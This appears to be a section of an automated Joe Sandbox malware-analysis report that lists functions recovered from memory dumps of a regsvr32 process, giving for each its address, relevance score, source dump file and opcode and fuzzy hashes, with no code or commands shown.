Instruction Fuzzy Hash: EAA19210F19E9A0BE786A76948F237A66D6EF9A700F4440BAD24DC73D3CE2CEC015781

Function 00007FFD34351E19 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4beafcd5192e5c5cd2c1cdc596c7fe9e6b7a9654f980def66c34286043f2db7c
Instruction ID: 684bb694622d60d6419008d6adb09a984bef1174af8a2111305025bac292609c
Opcode Fuzzy Hash: 4beafcd5192e5c5cd2c1cdc596c7fe9e6b7a9654f980def66c34286043f2db7c
Instruction Fuzzy Hash: F6710731F489099FEB94FB5CC4A9AA877E2FF99310F1501B5E10DD72A1DE39AC819B40

Function 00007FFD34356E65 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e710bb33361c200813f57d1c4c366f9a65e2d454aab13a061f7731dfa66ce63
Instruction ID: 30ccc80b5029e6701388fe9b99379bb18d9df9a9fd76d8da534595588b12728d
Opcode Fuzzy Hash: 1e710bb33361c200813f57d1c4c366f9a65e2d454aab13a061f7731dfa66ce63
Instruction Fuzzy Hash: 6F713F30B589099FEB94FB5CC095A6877E2FF99314F1142B9D11EC7692DB39F8418B80

Function 00007FFD345229BA Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4276955827211926b17261cca1e03d162b2764f94dff4e6aa8529125d64abc
Instruction ID: 795373b09d182fe29c176dfa10de35cae5fbbd4091328c988ac516d57bd298d5
Opcode Fuzzy Hash: 7f4276955827211926b17261cca1e03d162b2764f94dff4e6aa8529125d64abc
Instruction Fuzzy Hash: 9951C621B1CA8A0FE7A6E72C44A42796BD1FFDA244F1504BED18DC7292DE2CF802D301

Function 00007FFD345233B8 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b619d06121ab52399225e1e6c449b47302714ad4efbb56bc069343690a2fd6
Instruction ID: 7e3892ace5f00779d69a31d6d88a48424965e5cd2c50fb8eb5738a93b22f3fa9
Opcode Fuzzy Hash: 43b619d06121ab52399225e1e6c449b47302714ad4efbb56bc069343690a2fd6
Instruction Fuzzy Hash: 0251C361B1CE4A0FE7A6EB2C44A467967D1FF9A310F5500BED14DC7292EE2CE801D341

Function 00007FFD34523958 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83082119537a54ae16b60635acf1a24d1a4f17bb30963626ebc9d56fe0f8ee2e
Instruction ID: afea77ad1473677d045fd1637273161876834c57db607df34388053b80d80595
Opcode Fuzzy Hash: 83082119537a54ae16b60635acf1a24d1a4f17bb30963626ebc9d56fe0f8ee2e
Instruction Fuzzy Hash: C041A321B1CA8A4FE796EB2C44A567977D1FF9A210B1500BED14DC7296EE2CEC42D341

Function 00007FFD34521294 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27188239863711898b71bf76962358451c52235155e4425578651cecfb7800f6
Instruction ID: 627faa1f5dd7031b088960eabdd304738acfeb45f84f5f89bd4c6116169d50be
Opcode Fuzzy Hash: 27188239863711898b71bf76962358451c52235155e4425578651cecfb7800f6
Instruction Fuzzy Hash: CD41A261F1CE4A0FE796EB2C44A427AA7D2FF9A244B55407AD18DC3296DD3CE8019301

Function 00007FFD345209BA Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13085597a01fe5e2ad62605bf64e9373f8c1d69c78ce283cb64119838d770a1a
Instruction ID: 8f64c95d25067680e3b0efbcf87037bc9f4909f5eb8b8b9a10a9d62854d3160c
Opcode Fuzzy Hash: 13085597a01fe5e2ad62605bf64e9373f8c1d69c78ce283cb64119838d770a1a
Instruction Fuzzy Hash: D241B122B1DD4A0FEBD6EB2C44A427D67C2FFDA644B94417AD24DD3296DE2CE8029341

Function 00007FFD345539FC Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a6d5a2994aed2bc6b70586ea8b131b923c9cc4430895bb22cb1b7bdb086f03
Instruction ID: 0ca63cbd21feba51042bbcdbca8ff9ed49be6c4bc4788d151508cd9ff0d20615
Opcode Fuzzy Hash: a7a6d5a2994aed2bc6b70586ea8b131b923c9cc4430895bb22cb1b7bdb086f03
Instruction Fuzzy Hash: 75416F30A0CA098FEB65EA28C495BB573E1FF96314F1444B9D18EC3292CE79E882D741

Function 00007FFD34520813 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16a85ba515807f08c0fdfd9fdb62460ed096693fadede3ffac27e18de3bed24
Instruction ID: 1a348d378565707a1b480b0fb35bb28786177af2095a65cdbd963ed68dafd806
Opcode Fuzzy Hash: b16a85ba515807f08c0fdfd9fdb62460ed096693fadede3ffac27e18de3bed24
Instruction Fuzzy Hash: 0441B122B1DD4A0FE6D6FB1C44A527DA7C2FFD9240B55417AE14DD3396DE2CE8029341

Function 00007FFD34523B42 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd41b80838e30a2b74c3a68c5b9a588b3ec894d9f58f961a424e367d7eca4f8
Instruction ID: 9e40f7806f88f6f2f9c903086f47ab2e64ac65e2697fd56155bd50de10686bae
Opcode Fuzzy Hash: 3bd41b80838e30a2b74c3a68c5b9a588b3ec894d9f58f961a424e367d7eca4f8
Instruction Fuzzy Hash: 4131BF21B1DE4A4FE7D6EA2C54A527963C2FFDA354F1444BAD14DC3296DE3CE8029341

Function 00007FFD34523F44 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c46331feba90e0fe39943ab26e99a929e030a78d690bb74dcd751659f46483
Instruction ID: 06375584d4e569fc8a888b331d3a81108c936ef042dc733135910a2aedaa8440
Opcode Fuzzy Hash: 01c46331feba90e0fe39943ab26e99a929e030a78d690bb74dcd751659f46483
Instruction Fuzzy Hash: 5031C221B1CA4A1FE796EB2C54A427967D2FFDA250F14407BD14DC3286DD2CE8029341

Function 00007FFD34353B82 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14bb38b4774a6eba16cab1a99c160d8dfafde03e3ccc819d0f4850ae2e3653d0
Instruction ID: 486a0c3735b1760e176ef9f7da3b125566a6749f6b2369b9ae5cc3e57b1fb2b3
Opcode Fuzzy Hash: 14bb38b4774a6eba16cab1a99c160d8dfafde03e3ccc819d0f4850ae2e3653d0
Instruction Fuzzy Hash: 5C418031F4C9098FEB68FA08C8A55B877E1EF95311F0001B9D60EC3691DE3DB8469782

Function 00007FFD3455C045 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6b33e8f3ce564cb029243a6bd0e466078b13e2822b70ca631aeba5a2b85edf
Instruction ID: aeeafeb6c30bfe85649f16370e1c41ecb0b9f4c1b66bfc6c400abc806bf768fe
Opcode Fuzzy Hash: 9c6b33e8f3ce564cb029243a6bd0e466078b13e2822b70ca631aeba5a2b85edf
Instruction Fuzzy Hash: 5C31EA7190D7888FDB59DB68C8596EDBFF0EF56320F0441AFD049C7553D628A809CB51

Function 00007FFD3435B4C8 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8315dd2ed9f583bcaab6d5ceeae29649f38e336c744227dfdcb0daf68da0001
Instruction ID: 5bacd52ac1801daf86204d5a16c29b69008414dd6ca9c02b76647c31a711a081
Opcode Fuzzy Hash: b8315dd2ed9f583bcaab6d5ceeae29649f38e336c744227dfdcb0daf68da0001
Instruction Fuzzy Hash: 24318E31A4994A0FF764BB2898999B677E4FF56310B5402BDD548C3192DA3CFC828380

Function 00007FFD34524046 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 991ee144b694071124c5bf6a43d2571ead7e94aa5e9ba468257c16ee2c458e5a
Instruction ID: 6e5e5d870057fe1e93948d4eefb2c6b25b67dd6822bbf1982c56dce0ed67b0f4
Opcode Fuzzy Hash: 991ee144b694071124c5bf6a43d2571ead7e94aa5e9ba468257c16ee2c458e5a
Instruction Fuzzy Hash: 9631FB61B1CA4A4FE796EB2C54A4679A7D2FFDA244F14007FD14DC7292DE2CF8419341

Function 00007FFD3452437E Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f741fbf645dc9a6b6222888210438798b6ffabc3fb4f2217950ca55b2c5f590
Instruction ID: 30cf5b804eb969b25df0e39e0627a42b382b33978bfee7da185444e1498d6cb7
Opcode Fuzzy Hash: 7f741fbf645dc9a6b6222888210438798b6ffabc3fb4f2217950ca55b2c5f590
Instruction Fuzzy Hash: A131C921B1DA8A4FE796EB2C44A527967D2FFD6244F54007BD18DC7292DE2CF842D342

Function 00007FFD34523D0C Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7542c3f8fa4aeca7b2b04aa9f228e789d9f9514bd2e379b1006a4de6ab1e47d
Instruction ID: b397731670649d1f0ef9383d06002012e09c5ba20f921ec1915b90a41ceb6f42
Opcode Fuzzy Hash: c7542c3f8fa4aeca7b2b04aa9f228e789d9f9514bd2e379b1006a4de6ab1e47d
Instruction Fuzzy Hash: 5D31E421B1CA8A5FE796EB2C44A4279A7D1FFDA244F14007FD18DC7292DE2CE8029341

Function 00007FFD34529B83 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c43ee5ee6bbb16d6c0f0fcaae2ec7d4e21d211abe3b35508a97633e336c627
Instruction ID: de392c7dd5c53a802ca817af0995c99f7c2c289b5689e0931d97750afab64ac9
Opcode Fuzzy Hash: 07c43ee5ee6bbb16d6c0f0fcaae2ec7d4e21d211abe3b35508a97633e336c627
Instruction Fuzzy Hash: 90111200F18E1A17F696A66D44F537A61C6EF99A00F4481B9D20DD33C6CE6CFC526781

Function 00007FFD343576C8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b155d6e72e33413979c51346b693a51c87b90cddb4f1e41ef925bdb67284057e
Instruction ID: 2fbebd081ceb42c722e3f78490e5cdf5f8fc2b26de8dfedcfc5af4d15616d510
Opcode Fuzzy Hash: b155d6e72e33413979c51346b693a51c87b90cddb4f1e41ef925bdb67284057e
Instruction Fuzzy Hash: 1A21B87071CB458BDB44EA4CC89592ABBE2FFEA740F10496DE18983250CA79F8419B82

Function 00007FFD34554420 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79cf734ff4ec900a10e97aec2602bbe0c41b2ed1dbb5d114e9b47dd20f20f484
Instruction ID: 4527d89d5e2954ddca2ff798e8e376beb8c4872690418cd1854de663e7d7dd54
Opcode Fuzzy Hash: 79cf734ff4ec900a10e97aec2602bbe0c41b2ed1dbb5d114e9b47dd20f20f484
Instruction Fuzzy Hash: DE110631A0D7484FDB199A08DC556F93BE0EB4B321F0000BBE149D3252DA755C558782

Function 00007FFD3435F266 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf020b7ed4a4264e45ee29c275e631061fbad44e036d1d01546f43db88779f7
Instruction ID: d41785fb6a7f33d7d0d7cb160692134b9f652945a7801c82cc2cc8b63b00260d
Opcode Fuzzy Hash: ebf020b7ed4a4264e45ee29c275e631061fbad44e036d1d01546f43db88779f7
Instruction Fuzzy Hash: 4E11A05158E7C20BE35363B499651D17FE5AE87220B0D01FBD5C4CF1A7C95D688BC352

Function 00007FFD34353B8B Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbbb555ea222a8606b1bdbb451ba88715461abcd0cd0af8bbab8291dad214495
Instruction ID: 7df8e0919105cbffb349da389c44e5ede03309b6be2577b29dc0417a5dc13082
Opcode Fuzzy Hash: fbbb555ea222a8606b1bdbb451ba88715461abcd0cd0af8bbab8291dad214495
Instruction Fuzzy Hash: A111C631B4C5088FE768EA58D8A25B877E0EF49321F0001BED24ED3A51DE397C429642

Function 00007FFD3452423E Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4d2c5d594cab60e12af8a68b86b32e90e03ccf57f76c7e0362faf205e8155f0
Instruction ID: 0c0c5b391440825a47375536862ebd28ebee8be86cde580e627d892a502c9a3f
Opcode Fuzzy Hash: c4d2c5d594cab60e12af8a68b86b32e90e03ccf57f76c7e0362faf205e8155f0
Instruction Fuzzy Hash: 8C11B231A1CA4A4FE292EB1894A4679A7D1FFC9350F54447AE18CC3241DE3CF541D742

Function 00007FFD34523F08 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366518100.00007FFD34520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34520000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c91f11840daeec53680837e9b01891328ad7fa970aa4afd6beba01138c9a33
Instruction ID: 0650a743aada7a36ad198f742b560f7de4e6a17c0b01c4ae85bde7b747ce48c1
Opcode Fuzzy Hash: a7c91f11840daeec53680837e9b01891328ad7fa970aa4afd6beba01138c9a33
Instruction Fuzzy Hash: AA11BF31A1CA4A4FE292EB1894A4679A7D1FFC9350F54457AE18CC3281DE3CE5429342

Function 00007FFD34355765 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e7dbf641615f3af2e9047696f1a65ca7ce8d9b5efb08ac1eacc8815870525e
Instruction ID: 6d4075b632537f030d8eda754c51815b09449ff5488386c078a7b81c8ac76904
Opcode Fuzzy Hash: 05e7dbf641615f3af2e9047696f1a65ca7ce8d9b5efb08ac1eacc8815870525e
Instruction Fuzzy Hash: 8A11C122A4E6895FE792E72898A61EDBFA0EF93220B4501F7D548C7193DD2C38458342

Function 00007FFD34353BE6 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3fe98260d98b9983bd3c6dbb91efde794db41bb2a97853d05dd2981873e34e
Instruction ID: c47cbac20fb783abd35e4aceb393966cfa9c5e1df81101118601f934103ce125
Opcode Fuzzy Hash: 8b3fe98260d98b9983bd3c6dbb91efde794db41bb2a97853d05dd2981873e34e
Instruction Fuzzy Hash: 57112E317085088FDB58DF58E455AA9B3E1FB58311F1001AFD14ED3662CE31AD428B44

Function 00007FFD34351D58 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f06bafac61fdeeb27901154bd6f0a883122995ef4bf705e81e9553be21d8826
Instruction ID: be31442e819751abdc5fd18ca9c0624ba5f475e062e45b16528b1084a67e6dfa
Opcode Fuzzy Hash: 1f06bafac61fdeeb27901154bd6f0a883122995ef4bf705e81e9553be21d8826
Instruction Fuzzy Hash: 4511C461A4E7D41FDB52A7388875AA07FF0EF5721070A05EBE089CB1E3D92DAC45C752

Function 00007FFD3435BC6D Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c8c0e419cdc8ef1139e8e3a20f67ef08ce5d5ac3f21c768e41be1ba6ce54457
Instruction ID: 9578f0b70621bb09972ad97af13a4ff35f62e00dcef3002c9fd27e4b125adc36
Opcode Fuzzy Hash: 5c8c0e419cdc8ef1139e8e3a20f67ef08ce5d5ac3f21c768e41be1ba6ce54457
Instruction Fuzzy Hash: A4014422B5AA8A0EDB58F73D94A25E577E5EF8322034841F7C14CCB293EC2CB8029341

Function 00007FFD345574BD Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3366606539.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34550000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75660cdb21e98bf760bedc9f2ca839acf255026be81bbb2020fd57fe7e0976ef
Instruction ID: 78f90998d37b822d3a8d0184e7887eb917a0757efc02bdcdeb07e2f499ce24b5
Opcode Fuzzy Hash: 75660cdb21e98bf760bedc9f2ca839acf255026be81bbb2020fd57fe7e0976ef
Instruction Fuzzy Hash: 9BF09042B0EB890FD396916D2CA51747FD5D79B12170902F7D589C7297D84C5C8683A2

Function 00007FFD34364E54 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59bd598f122f40dd26548757d84f7a86df7b7ece862112a613a28d2b2eca002a
Instruction ID: 6c6e1d0ceed0acd5d063f645eb6144b7eb17d5cd02cc91123a04850c96c2aa5a
Opcode Fuzzy Hash: 59bd598f122f40dd26548757d84f7a86df7b7ece862112a613a28d2b2eca002a
Instruction Fuzzy Hash: A2F0BE12B5DD490FEB98F1AD28EA2B563C5E7EE23130401B7D048C3296CC5CAC828382

Function 00007FFD3435B148 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa310992f002ede3e8ca8695afc68c820750437cbc19f16b6215331e35067ff
Instruction ID: 7c31467e89d859064fddca27d05aa125c215eb0709d8a0ba0e96f1fd87e2b167
Opcode Fuzzy Hash: 2fa310992f002ede3e8ca8695afc68c820750437cbc19f16b6215331e35067ff
Instruction Fuzzy Hash: 87F0DC30A584495FEB85FB6894A92BDBBA0EB86200F4001F2E40CC3292DD3C29828742

Function 00007FFD3435AE45 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69ff33f39853496a1da3b3eb321a8f742ea451f96417aec1973289c5e2fb94b
Instruction ID: f6edb7ac164da1e6cb64d26d7451116ada55aa03bb613b2ad2bba24ce5f460a2
Opcode Fuzzy Hash: c69ff33f39853496a1da3b3eb321a8f742ea451f96417aec1973289c5e2fb94b
Instruction Fuzzy Hash: 94F0A711B19C1D0FAAA4F59D68E967677C5E7EE67174001BBE00CC3295CC1DBC429385

Function 00007FFD34351CEA Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ab01487cfb4b1c7a7cc15e0510234e571bd7861dd972ec04630166df7ef9261
Instruction ID: a02696b97ad506eaafb917dbf505500c4ff13bfae9d190fa7e1d4d155266463e
Opcode Fuzzy Hash: 5ab01487cfb4b1c7a7cc15e0510234e571bd7861dd972ec04630166df7ef9261
Instruction Fuzzy Hash: 5E018131F488098FEBA5A60CD49467577D2EF96311B1002F6D029C7294DA7CBC419780

Function 00007FFD343576EA Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6454ce20710eb00414c25718195980c49a448e91ef8059bfa6e2cc42f11784dd
Instruction ID: 80ea6de92520b86a6375f37fac031fb524b50064bd2acfd8c5c41a981e1a8ae0
Opcode Fuzzy Hash: 6454ce20710eb00414c25718195980c49a448e91ef8059bfa6e2cc42f11784dd
Instruction Fuzzy Hash: 7501BF7071CB448BD744EF4CC89552ABBE1FBE9B41F10456EF18583260DA75F8419B83

Function 00007FFD34354B58 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8d42974977e33c7f3c87f321dbe9f51b1ee97f47c77c7cdd6982baef5cd59b
Instruction ID: 7538a7932a6582ab64db0dfa8d72d19bb11f4a20e806a63266585af29011fbbd
Opcode Fuzzy Hash: bd8d42974977e33c7f3c87f321dbe9f51b1ee97f47c77c7cdd6982baef5cd59b
Instruction Fuzzy Hash: 71F0E927A4D2891BD726A768DCB21E63FA0EF13225B0C82F2D58D8E057ED19280986D1

Function 00007FFD343508A9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abeabe83e13f08fa1c628da2d3740e17197e628e6623712fb84e2cd04c11d004
Instruction ID: c5fccc022d846c461a657f8c092d3fcac53c9e48ec390d896e03e4b80a8bd6c0
Opcode Fuzzy Hash: abeabe83e13f08fa1c628da2d3740e17197e628e6623712fb84e2cd04c11d004
Instruction Fuzzy Hash: 03F0DFA298E7C80FE7135B2408A20947F70AE13100B4E46EBD1D8CB0A3D51EA9099352

Function 00007FFD3455B908 Relevance: .0, Instructions: 29COMMON

